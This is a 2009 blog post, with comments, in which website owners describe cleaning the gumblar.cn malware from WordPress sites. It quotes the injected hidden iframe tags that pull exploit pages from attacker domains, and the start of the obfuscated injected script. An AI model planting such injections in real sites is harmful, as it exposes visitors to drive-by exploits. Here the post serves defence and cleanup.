How to protect your website from gumblar.cn infection

Yesterday one of my websites got infected by a suspicious malware gumblar.cn. This website contains several exploits and trojans that can harm your system. How it starts its infection is to invoke Adobe Acrobat Reader on your machine. I found after browsing my infected site, Acrobat Reader process was running in Task Manager.

According to Google Safe Browsing Service

What happened when Google visited this site?
Of the 2 pages we tested on the site over the past 90 days, 0 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2009-05-05, and the last time suspicious content was found on this site was on 2009-05-05.
Malicious software includes 2341 scripting exploit(s), 6 trojan(s).

This site was hosted on 1 network(s) including AS42831 (UKSERVERS).

gumblar_cn_infection
I found some of php files were altered by adding a iframe at the end of the page. My infected files were <my-url>/wp-content/themes/<my-theme-dir>/index.php and <my-url>/wp-admin/index.php and in same directory index-extra.php. I didnt found any other file which was infected by this.

I manually removed this embedded iframe  <iframe src=”http://liteautotop .cn/ts/in.cgi?mozila” width=2 height=4 style=”visibility: hidden”></iframe>  and every things works fine.

If you have some type of information about this infection, people will highly appriciate who are messing arround the internet about the solution of this problem.

Update (5/11/09): I am able to remove this malware from my blog and WordPress admin site.

Removal

  • Removed image.php file from all images folder. image.php infection only found in ‘image’ folder. Make sure you didn’t remove the orignal image.php file. If your orignal file infected, only remove malicious code
  • Looked for iframe code added on the top or bottom of php page and remove it. I found this iframe which I removed. <iframe src=”http: //bigtruckstopseek .cn/ts/in.cgi?banner2″ width=2 height=4 style=”visibility: hidden”>
  • Checked all PHP, HTML and JS  files for added anonymous Java Script methods. I found all JS files infected in wp-include directory
  • Put httpdoc directory permission to 755
  • Scaned my computer with Malwarebytes’ Anti-Malware, which identified several threats and removed
  • Updated my AVG Anti Virus
  • Changed my FTP password
  • I did all this manual code removal activity from my Pleask control panel

Please fell free to make comment and your suggestions to make more security measures to prevent such threats.

Related Posts Plugin for WordPress, Blogger...

22 thoughts on “How to protect your website from gumblar.cn infection

  1. Yes – One of my client as also been infected by this malware. Everytime we remove it, it manages to creep back into the system.

    Most professionals are using Avast on your computer and a Secure FTP while uploading and files onto the server.

    This is the best information that I have read so far. Perhaps it could be useful for someone.

    http://www.dynamicdrive.com/forums/showthread.php?t=43390&page=3

    If there is any more valuable information we could be keen to learn.

  2. Thanks Gaurav for your comments.

    I will consider the software that your recommend for secure uploading. After my manual removal, it didn’t happen to inject in my files any more.

    I also recommend that hosting providers should upgrade their Linux machine with latest security patches. A Linux machine without a security patches is the most vulnerable.

  3. I found this virus 10 days ago and 4th of my customers got it .

    We removed it more than 10 times but the next day amazingly it was on all pages again .

    I found the source file .

    I each “Images” folder in your site it will copy a php file “image.php” .

    Before removing the script from pages , you must rewrite a same file instead of image.php and change the permissions .

    Then remove the scripts .

    If your site gets the iframe version as fast as you can , you must remove the iframe then replace the image.php .

    Because google may consider your site as a harmful site .

    A good news is that .asp files won’t get this virus .

    Another thing is that , in cms sites i changes the permissions of template folders !!!

  4. Thanks adel. The same is happening with me. After removing iframe code from my infected pages I found it appears again. The thing you talk about image.php and changing permission of theme folder looks very helpful. Lets see after following this, this malware infection removed permanently or not.

  5. Tahir,

    Unfortunately your site is still infected. Both with the iframe from “bigtruckstopseek .cn” (which is actually not the gumblar exploit) and with the real “gumblar” script, which can be fount right before the body tag. It starts with “(function(){var CEz9t=’%’;var fQJ=(‘va.72.20a.3d.22S…“.

    Read my article about this exploit. There are many comments with additional information that may help you get rid of this exploit.
    http://blog.unmaskparasites.com/2009/05/07/gumblar-cn-exploit-12-facts-about-this-injected-script/

  6. Enough files that I have found infected by this. I am unable to find the code you mentioned in my PHP files. But let me tell I use fact no. 10 given in your blog. And I am also able to remove iframe for bigtruckstopseek.cn/ts/in.cgi?banner2. Your blog is very helpful.

  7. Hi Guys,

    I had the same issue, after cleaning the file it came back again. The problem seems to be you might have given global access to the folder. When I removed the access and gave read only and write access to admin, the problem was solved.

    Guys check and let me know if it works.

    Regards,
    Lloyd

  8. Lloyd what chmod you are using for your directories. The problem for me is if I remove write and executable access from ‘Other’ group, by blog appears in blank page. So I am thinking what chmod will suit my situation. Any idea…

  9. Thanks Denis, ST, Gaurav, adel & Lloyd for your comments and support to remove this threat.

    I am successfully removed this threat from my blog and wordpress admin. And I pretty much followed what you said. I have updated the post with my course of actions. Please feel free to make comment.

    Again thanks.

  10. Hello
    now is a few days when i open my site my Persian.be antivirus gives that Application firefox contains to web page gumblar .cn/rrs/?id=, uses to steal password, credit card numbers or other confidential data. Denied.
    what can i do to fix it?

  11. Pingback: Bu vir

  12. Pingback: Pick Shane’s Brain » Blog Archive » Yikes!

  13. Pingback: Archivos html y php infectados - Foro de Spyware

Leave a Reply

Your email address will not be published. Required fields are marked *